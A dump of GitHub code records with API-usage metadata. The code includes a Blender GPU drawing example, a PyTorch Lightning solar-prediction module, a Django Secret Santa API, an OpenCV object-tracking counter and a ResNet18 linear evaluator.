"Droso.views.eyedimen", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 72, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 73, "usage_type": "call"}, 
{"api_name": "Droso.views.eyedimen2", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 73, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 74, "usage_type": "call"}, {"api_name": "Droso.views.e_dimen_out", "line_number": 74, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 74, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "Droso.views.wing_dashboard", "line_number": 77, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 77, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 78, "usage_type": "call"}, {"api_name": "Droso.views.eye_dashboard", "line_number": 78, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 78, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 81, "usage_type": "call"}, {"api_name": "Droso.views.ring_assay_1", "line_number": 81, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 81, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 82, "usage_type": "call"}, {"api_name": "Droso.views.ring_assay_2", "line_number": 82, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 82, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 83, "usage_type": "call"}, {"api_name": "Droso.views.ring_out", "line_number": 83, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 83, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 98, "usage_type": "call"}, {"api_name": "Droso.views.generate_pdf_view", "line_number": 98, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 98, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 99, "usage_type": "call"}, {"api_name": "Droso.views.dowdata", "line_number": 99, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 99, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 100, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 102, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 102, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 103, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 103, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 103, "usage_type": "attribute"}]} +{"seq_id": "15843899839", "text": "\"\"\"\nMesh with Random Vertex Colors\n------------------------------\n\"\"\"\nimport bpy\nimport gpu\nimport numpy as np\nfrom random import random\nfrom gpu_extras.batch import batch_for_shader\n\nmesh = bpy.context.active_object.data\nmesh.calc_loop_triangles()\n\nvertices = np.empty((len(mesh.vertices), 3), 'f')\nindices = np.empty((len(mesh.loop_triangles), 3), 'i')\n\nmesh.vertices.foreach_get(\n \"co\", np.reshape(vertices, len(mesh.vertices) * 3))\nmesh.loop_triangles.foreach_get(\n \"vertices\", np.reshape(indices, len(mesh.loop_triangles) * 3))\n\nvertex_colors = [(random(), random(), 
random(), 1) for _ in range(len(mesh.vertices))]\n\nshader = gpu.shader.from_builtin('SMOOTH_COLOR')\nbatch = batch_for_shader(\n shader, 'TRIS',\n {\"pos\": vertices, \"color\": vertex_colors},\n indices=indices,\n)\n\n\ndef draw():\n gpu.state.depth_test_set('LESS_EQUAL')\n gpu.state.depth_mask_set(True)\n batch.draw(shader)\n gpu.state.depth_mask_set(False)\n\n\nbpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW')\n", "repo_name": "blender/blender", "sub_path": "doc/python_api/examples/gpu.4.py", "file_name": "gpu.4.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bpy.context", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 20, "usage_type": "call"}, {"api_name": "random.random", "line_number": 22, "usage_type": "call"}, {"api_name": "gpu.shader.from_builtin", "line_number": 24, "usage_type": "call"}, {"api_name": "gpu.shader", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gpu_extras.batch.batch_for_shader", "line_number": 25, "usage_type": "call"}, {"api_name": "gpu.state.depth_test_set", "line_number": 33, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gpu.state.depth_mask_set", "line_number": 34, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 34, "usage_type": "attribute"}, {"api_name": "gpu.state.depth_mask_set", "line_number": 36, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.types.SpaceView3D.draw_handler_add", "line_number": 39, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "28535180025", "text": "\"\"\"\nCommon code for running pytorch lightning modules in the solpred project\n\"\"\"\n\n\n# Imports\nfrom pathlib import Path\nfrom argparse import ArgumentParser\nimport datetime\nimport json\n\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\nimport pandas as pd\n\nfrom solpreddatamodule import SolpredDataModule\n\nclass SolpredModule(pl.LightningModule):\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--input_terms', type=int, required=True)\n parser.add_argument('--model_name', type=str, required=True)\n parser.add_argument('--learning_rate', type=float, required=True)\n return parser\n\n def __init__(self, args):\n super().__init__()\n self.model_name = args.model_name\n self.batch_size = args.batch_size\n self.learning_rate = args.learning_rate\n self.test_results = []\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky)\n loss = F.mse_loss(pred, target)\n return loss\n\n def validation_step(self, batch, batch_idx):\n img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, 
target_clear_sky)\n        loss = F.mse_loss(pred, target)\n        self.log(\"val_loss\", loss, batch_size=self.batch_size)\n        return loss\n\n    def test_step(self, batch, batch_idx):\n        img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n        pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky)\n        loss = F.mse_loss(pred, target)\n        self.log(\"test_loss\", loss, batch_size=1)\n        ghi_label = \"globalcmp11physical\" if \"globalcmp11physical\" in json_data[0][\"inputs\"][0] else \"value\"\n        for i, d in enumerate(json_data):\n            # Looping through each element in the batch\n            time = d[\"id\"] # Time is defined by id - typically when the prediction was made\n            result = {\"actual\": target[i].item(), # The value we were trying to predict\n                self.model_name + \"_pred\": pred[i].item(), # the prediction from our model\n                \"persist_pred\": json_data[i][\"inputs\"][0][ghi_label]} # Taking the most recent observed value as persistence\n            for key, value in result.items():\n                # For each series in result\n                self.test_results.append(\n                    {\"time\": time,\n                    \"series\": key,\n                    \"value\": value})\n        #step_df = pd.DataFrame(step_results, columns=[\"time\", \"series\", \"value\"])\n        #step_df.set_index(\"time\") # I think we throw away the index at csv export anyway\n        return loss\n\n    def export_test_csv(self, output_path):\n        pd.DataFrame(self.test_results, columns=[\"time\", \"series\", \"value\"]).to_csv(output_path, index=False)\n        #pd.concat(self.test_results, axis=\"index\", ignore_index=True).to_csv(output_path, index=False)\n\n\ndef make_callbacks(args):\n    x = [\n        pl.callbacks.EarlyStopping(\n            monitor=\"val_loss\",\n            patience=args.stopping_patience,\n            min_delta=0.0,\n            strict=True,\n            verbose=True,\n            mode=\"min\",\n        ),\n        pl.callbacks.ModelCheckpoint(\n            save_top_k=1,\n            verbose=True,\n            monitor=\"val_loss\",\n            filename=args.model_name + \"_{epoch:02d}_{val_loss:.2f}\",\n            mode=\"min\",\n        ),\n        pl.callbacks.ModelCheckpoint(\n            save_top_k=1,\n            monitor=\"val_loss\",\n            mode=\"min\",\n            dirpath=\"./\",\n            filename=\"latest_best\",\n        ),\n    ]\n    if args.use_stochastic_weight_averaging:\n        x.append(pl.callbacks.StochasticWeightAveraging(swa_epoch_start=2))  # append in place; list.append returns None, so do not rebind x\n    return x\n\ndef test_phase(model, trainer, data, test_output):\n    with open(\"started_testing.json\", \"w\") as f:\n        print(\"Starting Testing\")\n        json.dump({\"start_time\": str(datetime.datetime.now())}, f)\n    trainer.test(model, datamodule=data)\n    print(\"exporting\")\n    model.export_test_csv(test_output)\n\ndef main(args, model):\n    data = SolpredDataModule(args)\n    if args.visualise:\n        print(\"Visualising\")\n        data.setup()\n        model.visualise_activations(data.test_dataloader())\n    else:\n        trainer = pl.Trainer.from_argparse_args(args, callbacks=make_callbacks(args))\n        # Run Train\n        if not args.test:\n            if args.load_checkpoint and args.resume_train:\n                print(\"Loaded checkpoint weights and training state\")\n                trainer.fit(model, data, ckpt_path=args.load_checkpoint)\n            elif args.load_checkpoint:\n                print(\"Loaded checkpoint weights but not training state\")\n                trainer.fit(model, data)\n            else:\n                print(\"No previous checkpoint data was loaded\")\n                trainer.fit(model, data)\n        else:\n            print(\"Skipping Training\")\n        # Run Test\n        test_phase(model, trainer, data, args.test_output)\n    print(\"Main Done\")\n\n\ndef make_parser():\n    parser = ArgumentParser()\n    # add PROGRAM level args\n    parser.add_argument('--load_checkpoint', type=Path, help=\"Load checkpoint from path\")\n    parser.add_argument('--resume_train', 
action='store_true', help=\"Restore training status from checkpoint\")\n parser.add_argument('--visualise', action='store_true', help=\"Only run visualise_activations, no training\")\n parser.add_argument('--test', action='store_true', help=\"Only run inference, no training\")\n parser.add_argument('--test_output', type=str, default='test_out.csv.gz')\n parser.add_argument('--stopping_patience', type=int, default=10, help=\"Early Stopping Patience\")\n parser.add_argument('--use_stochastic_weight_averaging', action='store_true', help=\"Run with SWA turned on\")\n return parser\n\nif __name__ == '__main__':\n print(\"This is only common code, this module is meant to be imported\")\n", "repo_name": "wongjoel/Solpred", "sub_path": "resources/scripts/solpred_common.py", "file_name": "solpred_common.py", "file_ext": "py", "file_size_in_byte": 6362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 18, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 77, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 85, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 92, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.StochasticWeightAveraging", "line_number": 101, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 101, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 107, "usage_type": "attribute"}, {"api_name": "solpreddatamodule.SolpredDataModule", "line_number": 113, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 119, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 119, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "25789556138", "text": "from random import randint, shuffle\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_POST\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom .models import Group, Participant\nfrom 
.serializers import GroupSerializer, GroupShortSerializer, ParticipantSerializer\n\n\nclass GroupViewSet(viewsets.ViewSet):\n\n def create(self, request):\n serializer = GroupSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n group = serializer.save()\n return Response(group.id, status=201)\n\n def list(self, request):\n groups = Group.objects.all()\n return Response(GroupShortSerializer(groups, many=True).data)\n\n def retrieve(self, request, group_id):\n group = get_object_or_404(Group, id=group_id)\n return Response(GroupSerializer(group).data)\n\n def update(self, request, group_id):\n serializer = GroupSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n group = get_object_or_404(Group, id=group_id)\n group = serializer.update(group, serializer.validated_data)\n return Response(GroupSerializer(group).data, status=204)\n\n def destroy(self, request, group_id):\n group = get_object_or_404(Group, id=group_id)\n deleted_group_id = group.id\n group.delete()\n return Response(deleted_group_id, status=204)\n\n# [\n# {\n# \"id\": 1,\n# \"name\": \"string\",\n# \"description\": \"string\"\n# }\n# ]\n\n# {\n# \"name\": \"string\",\n# \"description\": \"string\"\n# }\n\n# {\n# \"name\": \"string\",\n# \"wish\": \"string\"\n# }\n\n\nclass ParticipantViewSet(viewsets.ViewSet):\n\n def create(self, request, group_id):\n serializer = ParticipantSerializer(data=request.data, context={'group_id': group_id})\n serializer.is_valid(raise_exception=True)\n participant = serializer.save()\n return Response(participant.id, status=201)\n\n def destroy(self, request, group_id, participant_id):\n participant = get_object_or_404(Participant, id=participant_id, group_id=group_id)\n deleted_participant_id = participant.id\n participant.delete()\n return Response(deleted_participant_id, status=204)\n\n\nclass ShuffleViewSet(viewsets.ViewSet):\n\n def toss(self, request, group_id):\n\n participants = Participant.objects.filter(group_id=group_id)\n initial = [participant for participant in participants]\n if len(initial) < 3:\n raise ValidationError('Group must have 3 or more participants for toss')\n shuffle(initial)\n rotation = randint(1, len(initial) - 1)\n rotated = initial[rotation:] + initial[:rotation]\n\n for part, rec in zip(initial, rotated):\n part.recipient = rec\n part.save()\n data = ParticipantSerializer(participants, many=True).data\n return Response(data, status=204)\n", "repo_name": "reatlaz/santa", "sub_path": "groups/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3006, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.viewsets.ViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Group.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "serializers.GroupShortSerializer", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 26, 
"usage_type": "call"}, {"api_name": "models.Group", "line_number": 26, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 27, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 32, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 37, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 61, "usage_type": "name"}, {"api_name": "serializers.ParticipantSerializer", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 70, "usage_type": "call"}, {"api_name": "models.Participant", "line_number": 70, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Participant.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Participant.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Participant", "line_number": 80, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 83, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "serializers.ParticipantSerializer", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "29057316966", "text": "import copy\nimport time\nimport argparse\n\nimport cv2,math\nfrom pathlib import Path\n\nfrom Detector.detector import ObjectDetector\nfrom Tracker.tracker import MultiObjectTracker\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--movie\", type=str, default='videos/tomato2.mp4')\n\n parser.add_argument(\n '--detector',\n choices=[\n 'yolox_n',\n 'yolox_s',\n 'yolox_m',\n 'yolo_tgi_n',\n 'yolo_tgi_s',\n 'yolo_tgi_m',\n 'nanodet_n',\n 'nanodet_s',\n 'nanodet_m',\n\n ],\n default='yolo_tgi_s',\n )\n parser.add_argument(\n '--tracker',\n choices=[\n 'motpy',\n 'mc_bytetrack',\n 'mc_norfair',\n ],\n default='mc_bytetrack',\n )\n\n parser.add_argument(\"--target_id\", type=str, default='2')\n\n parser.add_argument('--use_gpu', action='store_true')\n\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = get_args()\n\n cap_device = args.device\n if args.movie is not None:\n cap_device = args.movie\n\n detector_name = args.detector\n 
tracker_name = args.tracker\n\n    target_id = args.target_id\n    if target_id is not None:\n        target_id = [int(i) for i in target_id.split(',')]\n\n    use_gpu = args.use_gpu\n\n    # Video ini\n    cap = cv2.VideoCapture(cap_device)\n    cap_fps = cap.get(cv2.CAP_PROP_FPS) ###fps\n    # Object Detection loading Detect model\n    detector = ObjectDetector(\n        detector_name,\n        target_id,\n        use_gpu=use_gpu,\n    )\n    # detector.print_info()\n\n    # Multi Object Tracking loading tracking model\n    tracker = MultiObjectTracker(\n        tracker_name,\n        cap_fps,\n        use_gpu=use_gpu,\n    )\n    # tracker.print_info()\n    track_id_dict = {}\n    filtered_ids_dict={}\n    id_no = 0\n    center_tracks={}\n    save_path = 'demo'\n    N, img = cap.read()\n    fps, w, h = cap_fps, img.shape[1], img.shape[0]\n    save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos\n    vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n    while True:\n        start_time = time.time()\n        ret, frame = cap.read()\n        if not ret:\n            break\n        #frame=cv2.flip(cv2.transpose(frame), 0)\n        debug_image = copy.deepcopy(frame)\n\n        frame_h,frame_w,_=debug_image.shape\n        x_min=int(frame_w/2-250)\n        x_max=int(frame_w/2+250)\n        #print('h',frame_h,'w',frame_w)\n\n        d_bboxes, d_scores, d_class_ids = detector(frame) ### get (bbox, scores, class_id)\n        # Multi Object Tracking\n        track_ids, t_bboxes, t_scores, t_class_ids = tracker(\n            frame,\n            d_bboxes,\n            d_scores,\n            d_class_ids,\n        )\n\n        #print('track_ids',track_ids,len(track_ids))\n        t,filtered_id_dict= total_count(track_ids, t_bboxes, x_min,x_max,id_no,filtered_ids_dict)\n        #print('filtered_id_dict',filtered_id_dict)\n        total_numbers = len(filtered_id_dict)\n\n\n        # link track_id\n        for track_id in track_ids:\n            if track_id not in track_id_dict:\n                new_id = len(track_id_dict)\n                track_id_dict[track_id] = new_id\n\n        #print('track_id_dict)',track_id_dict,len(track_id_dict))\n\n        elapsed_time = time.time() - start_time\n\n        debug_image = draw_debug_info(\n            debug_image,\n            elapsed_time,\n            track_ids,\n            t_bboxes,\n            t_scores,\n            t_class_ids,\n            track_id_dict,\n            #filtered_id_dict,\n            total_numbers,\n            x_min,\n            x_max,\n            frame_h,\n            center_tracks\n        )\n\n        key = cv2.waitKey(1)\n        if key == 27: # ESC\n            break\n        cv2.imshow('Detection and tracking', debug_image)\n        vid_writer.write(debug_image)\n    vid_writer.release()\n    # cap.release()\n    # cv2.destroyAllWindows()\n\ndef get_id_color(index):\n    #temp_index = abs(int(index + 1)) * 3\n    if index == 1:\n        color=(0,255,0)\n    elif index == 2:\n        color=(255,0,0)\n    elif index ==3 :\n        color=(255,255,0)\n    else:\n        color=(0,0,255) # fallback so color is always bound for unexpected class ids\n    text_color_bgr = tuple(reversed(color))\n    return text_color_bgr\n\ndef total_count(track_ids, bboxes, x_min,x_max,id_no,filtered_ids_dict):\n    for i in range(len(bboxes)):\n        x1, y1, x2, y2= bboxes[i]\n        # line-crossing detection point (x1,y1), x-direction offset ratio 0.0~1.0\n        x_center= int(x1 + ((x2 - x1) * 0.5))\n        # point used for the line-crossing check\n        x = x_center\n        if x > x_min and x < x_max:\n            if track_ids[i] not in filtered_ids_dict:\n                filtered_ids_dict[track_ids[i]]=id_no\n                id_no += 1\n            # elif track_ids[i] in filtered_ids_dict:\n            #     filtered_ids_dict.remove(track_ids[i])\n\n    return (id_no,filtered_ids_dict)\n    #return(filtered_ids_dict,bboxes_dict,scores_dict,class_ids_dict,count_no)\n\ndef distance(point1, point2):\n    return math.sqrt((point1[0] - point2[0]) ** 2 + (point1[1] - point2[1]) ** 2)\n\n\n\ndef draw_debug_info(\n    debug_image,\n    elapsed_time,\n    track_ids,\n    bboxes,\n    scores,\n    class_ids,\n    track_id_dict,\n    count_no,\n    x_min,\n    x_max,\n    frame_h,\n    center_tracks,\n\n):\n    #for id, bbox, score, class_id in zip(track_ids, bboxes, scores, class_ids):\n    ####filter here\n    data= zip(track_ids, bboxes, scores, class_ids)\n    print('class_ids:',class_ids)\n    # data_sorted=sorted(data, key=lambda x: x[1][0],reverse=True)\n    #print(bboxes)\n    for id, bbox, score, class_id in data:\n\n        x1, y1, x2, y2 = int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])\n        class_id=int(class_id)\n        #color = get_id_color(track_id_dict[id])\n        print('class_id:'+str(class_id))\n        color = get_id_color(class_id)\n        # color = get_id_color(2)\n        debug_image = cv2.rectangle(\n            debug_image,\n            (x1, y1),\n            (x2, y2),\n            color,\n            thickness=3,\n        )\n\n        center = (int((x1 + x2) / 2), int((y1+y2) / 2)) # BBox center point\n        debug_image=cv2.circle(debug_image,center, 2, (0, 255, 0), -1)\n        if id not in center_tracks:\n            center_tracks[id]=[]\n        center_tracks[id].append(center)\n        # distance threshold for drawing the trajectory\n        distance_threshold = 50\n        #for i in range(1, len(center_tracks[id])):\n            #if distance(center_tracks[id][i - 1], center_tracks[id][i]) < distance_threshold:\n                # draw the trajectory line\n                # cv2.line(debug_image, center_tracks[id][i - 1], center_tracks[id][i], (0, 0, 255), 3)\n        #score = '%.2f' % score\n        #text = 'TID:%s(%s)' % (str(int(track_id_dict[id])), str(score))\n        #text = 'TID:%s(%s)' % (str(int(2)), str(score))\n        #debug_image = cv2.putText(debug_image,text,(x1, y1 - 22),cv2.FONT_HERSHEY_SIMPLEX,0.5,color,thickness=3)\n        ###video save\n\n\n        # text = 'CID:%s' % (str(int(class_id)))\n        #debug_image = cv2.putText( debug_image,text,(x1, y1 - 8),cv2.FONT_HERSHEY_SIMPLEX,0.5,color,thickness=3)\n\n    # inference time\n    cv2.putText(debug_image,\"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",(10, 30),cv2.FONT_HERSHEY_SIMPLEX,0.7,\n                (0, 255, 0),\n                2,\n                cv2.LINE_AA,\n                )\n\n    cv2.putText(\n        debug_image,\n        \"Total numbers : \" + '{:.1f}'.format(count_no) ,\n        (10, 60),\n        cv2.FONT_HERSHEY_SIMPLEX,\n        0.7,\n        (0, 255, 0),\n        2,\n        cv2.LINE_AA,\n    )\n    cv2.line(debug_image, (x_min, 0), (x_min, frame_h), (0, 255, 255), 10)\n    cv2.line(debug_image, (x_max, 0), (x_max, frame_h), (0, 255, 255), 10)\n\n    return debug_image\n\n\nif __name__ == '__main__':\n    main()\n", "repo_name": "RuiKangnj/TGI", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "Detector.detector.ObjectDetector", "line_number": 73, "usage_type": "call"}, {"api_name": "Tracker.tracker.MultiObjectTracker", "line_number": 81, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 97, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 102, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 153, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 230, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 251, "usage_type": "call"}, 
{"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 251, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 254, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 257, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 261, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 268, "usage_type": "call"}]} +{"seq_id": "37105907253", "text": "import torch\nfrom torch import nn\nfrom torchvision import models\n\nclass LinearEvaluatorModel(nn.Module):\n def __init__(self, num_classes=100) -> None:\n super().__init__()\n resnet18 = models.resnet18()\n resnet18.conv1 = nn.Conv2d(\n 3, 64, kernel_size=3, stride=1, padding=2, bias=False\n )\n resnet18.maxpool = nn.Identity()\n self.backbone = nn.Sequential(*list(resnet18.children())[:-1])\n for param in self.backbone.parameters():\n param.requires_grad = False\n \n hidden_size = resnet18.fc.in_features\n self.classifier = nn.Linear(hidden_size, num_classes)\n self.criterion = nn.CrossEntropyLoss()\n \n def train(self, mode=True):\n super().train(mode)\n self.backbone.eval()\n \n def forward(self, x, labels=None):\n with torch.no_grad():\n feats = self.backbone(x).squeeze()\n logits = self.classifier(feats)\n out = (logits, )\n if labels is not None:\n loss = self.criterion(logits, labels)\n out += (loss, )\n\n return out", "repo_name": "mwritescode/nnclr-cifar100", "sub_path": "src/models/evaluator.py", "file_name": "evaluator.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 